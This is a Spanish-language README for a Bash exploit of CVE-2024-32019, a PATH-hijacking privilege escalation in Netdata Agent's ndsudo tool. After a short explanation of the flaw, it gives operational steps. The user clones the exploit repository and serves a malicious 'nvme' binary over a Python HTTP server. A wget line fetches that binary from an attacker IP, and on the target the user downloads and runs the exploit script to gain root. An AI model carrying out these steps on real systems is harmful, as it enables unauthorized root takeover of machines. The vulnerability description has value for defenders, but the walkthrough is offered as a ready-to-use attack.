
Exploit de escalada de privilegios basado en Bash para CVE-2024-32019 en la herramienta ndsudo del Agente Netdata, aprovechando la búsqueda de PATH no confiable para ejecutar binarios arbitrarios con permisos de root.
La vulnerabilidad ndsudo permite a un atacante obtener permisos de root explotando una ruta de búsqueda no confiable en la herramienta ndsudo, que forma parte del Netdata Agent. Esto puede permitir la ejecución de programas arbitrarios con privilegios elevados si el atacante coloca un binario malicioso en un directorio escribible y modifica la variable de entorno PATH en consecuencia.
La vulnerabilidad ndsudo, identificada como CVE-2024-32019, afecta a las versiones de la herramienta ndsudo incluidas con Netdata Agent, específicamente las versiones v1.45.0 y anteriores. Esta vulnerabilidad permite a los atacantes escalar privilegios en los sistemas donde la herramienta está instalada.
Cómo funciona la vulnerabilidad:
Mecanismo de explotación:-
Ruta de búsqueda no confiable: La herramienta ndsudo utiliza la variable de entorno PATH para localizar comandos externos. Un atacante puede manipular esta variable para que apunte a un directorio que controle.
Ejecución de binarios maliciosos: Al colocar un ejecutable malicioso con el mismo nombre que un comando que ndsudo pueda
ejecutar (por ejemplo, nvme) en un directorio escribible, el atacante puede ejecutar código arbitrario con permisos de root.
Complejidad del ataque:-
Baja complejidad: El ataque no requiere habilidades avanzadas; un script bash fácilmente creado puede usarse para escalar privilegios, lo que lo hace accesible para muchos atacantes potenciales.
Impacto de la vulnerabilidad:-
Escalada de privilegios: Una explotación exitosa permite a un atacante obtener acceso root, lo que puede llevar a un control total sobre el sistema afectado.
Riesgos potenciales: Esto puede resultar en acceso no autorizado a datos, manipulación del sistema y una mayor explotación de recursos de la red.
PRIVILEGE ESCALATION He creado dos scripts bash para obtener fácilmente acceso de usuario a root. Siga los pasos como se mencionan a continuación:
git clone https://github.com/justjoeyking/CVE-2024-32019-ndsudo.git
cd CVE-2024-32019-ndsudo
chmod +x ndsudo_exp.sh
Ahora cree un servidor python:
python3 -m http.server 8080
Abra el archivo ndsudo_exploit.sh usando gedit o pluma, el que esté disponible. Podrá ver el comando wget de esta forma:
wget http://10.10.14.70:8080/nvme -o /tmp/nvme
Cambie la dirección IP por la IP de su propia máquina.
Ahora vaya a la máquina objetivo, abra una terminal y haga lo siguiente:
wget http://<su-ip>:8080/ndsudo_exploit.sh
chmod +x ndsudo_exploit.sh
./ndsudo_exploit.sh